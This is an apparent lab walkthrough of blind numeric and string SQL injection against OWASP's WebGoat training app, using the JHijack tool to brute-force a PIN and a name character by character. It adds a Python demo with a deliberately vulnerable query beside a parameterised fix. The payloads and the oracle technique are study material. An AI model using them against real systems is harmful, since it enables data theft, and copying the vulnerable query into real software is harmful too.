Webgoat attack blind SQL injection – All things in moderation

Webgoat attack blind SQL injection

This example uses the WebGoat lab. You can download it from: https://sourceforge.net/projects/owaspbwa/

Download the tool JHijack from: http://yehg.net/lab/pr0js/files.php/jhijackv0.2beta.zip

1. Blind Numeric SQL injection


Response analysis

If the injected condition is true, the response is: Account number is valid.

If it is false, the response is: Invalid account number.


SQL query analysis

select pin from pins where cc_number='1111222233334444'

SQL injection payload

account_number=101 and 1= ((select pin from pins where cc_number='1111222233334444') =123 )

Blind SQLi using JHijack


Set the input fields:

Host: 192.168.40.128

Port: 80

Url: /WebGoat/attack?Screen=308&menu=1100&SUBMIT=Go%21

Grep: Account number is valid.

SESSID: JSESSIONID=8EC152C944024F89969F3F56A27DC873

HijackID: &account_number=101 and 1= ((select pin from pins where cc_number='1111222233334444') =$ )

Range: $= 1000-5000

Then run the brute force with the Hijack button.


Result: 101 and 1= ((select pin from pins where cc_number='1111222233334444') =2364 )

-> $ = 2364
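As an added illustration (not from the original post and not WebGoat's own code), the script below rebuilds the response oracle above against an in-memory SQLite database with constructed sample rows: the vulnerable lookup pastes the account_number parameter into the SQL text, so replaying the JHijack range confirms exactly one PIN, while a parameterised lookup with input validation answers "Invalid" for every payload. The table name user_data and the shape of the outer query are assumptions.

```python
import sqlite3

VALID = "Account number is valid."
INVALID = "Invalid account number."


def build_db() -> sqlite3.Connection:
    # Constructed stand-in for the lab database (sample rows, not WebGoat's real schema).
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE user_data(account_number INTEGER PRIMARY KEY);
        INSERT INTO user_data VALUES (101);
        CREATE TABLE pins(cc_number TEXT, pin INTEGER, name TEXT);
        INSERT INTO pins VALUES ('1111222233334444', 2364, 'Jill');
    """)
    return con


def lookup_vulnerable(con: sqlite3.Connection, account_number: str) -> str:
    # Assumed shape of the lab's outer query: the request parameter becomes part
    # of the WHERE clause, so "101 and 1=(...)" is evaluated as SQL.
    sql = f"SELECT 1 FROM user_data WHERE account_number = {account_number}"
    return VALID if con.execute(sql).fetchone() else INVALID


def lookup_hardened(con: sqlite3.Connection, account_number: str) -> str:
    # Two independent fixes: reject anything that is not an integer, and bind
    # the value as a parameter so the database never parses it as SQL.
    if not account_number.isdigit():
        return INVALID
    row = con.execute("SELECT 1 FROM user_data WHERE account_number = ?",
                      (int(account_number),)).fetchone()
    return VALID if row else INVALID


def pin_guess_payload(guess: int) -> str:
    # The post's HijackID template with $ replaced by one candidate PIN.
    return f"101 and 1= ((select pin from pins where cc_number='1111222233334444') ={guess} )"


def confirmed_guesses(lookup, con: sqlite3.Connection, lo: int, hi: int) -> set:
    # Replays the JHijack range against a lookup function and returns the guesses
    # the response oracle confirms. A leaky endpoint returns exactly one value.
    return {g for g in range(lo, hi + 1) if lookup(con, pin_guess_payload(g)) == VALID}


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", confirmed_guesses(lookup_vulnerable, db, 1000, 5000))  # {2364}
    print("hardened:  ", confirmed_guesses(lookup_hardened, db, 1000, 5000))   # set()
```

A generic response for both the "not found" and "malformed input" cases removes the second half of the oracle; the parameter binding removes the first.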

2. Blind String SQL injection


Response analysis

If the injected condition is true, the response is: Account number is valid.

If it is false, the response is: Invalid account number.

SQL query analysis

select name from pins where cc_number='1111222233334444'

Blind SQLi using JHijack

First find the length of the name string.

Set HijackID:

&account_number=101 AND ((SELECT LENGTH(name) FROM pins WHERE cc_number='4321432143214321') = $ )

-> length = 4

Now brute-force each character of the name.

Set HijackID:

&account_number=101 AND ((SELECT ASCII(SUBSTRING(name, 1, 1)) FROM pins WHERE cc_number='4321432143214321') = $ )

-> ASCII(name[0]) = 74

The function is SUBSTRING(str, position, length), so SUBSTRING(name, 1, 1) returns the first character of the name.

Increment "position" and set the HijackID again for each character:

SUBSTRING(name, 2, 1) -> ASCII(name[1]) = 105

SUBSTRING(name, 3, 1) -> ASCII(name[2]) = 108

SUBSTRING(name, 4, 1) -> ASCII(name[3]) = 108

-> result : 74 105 108 108

-> name = Jill
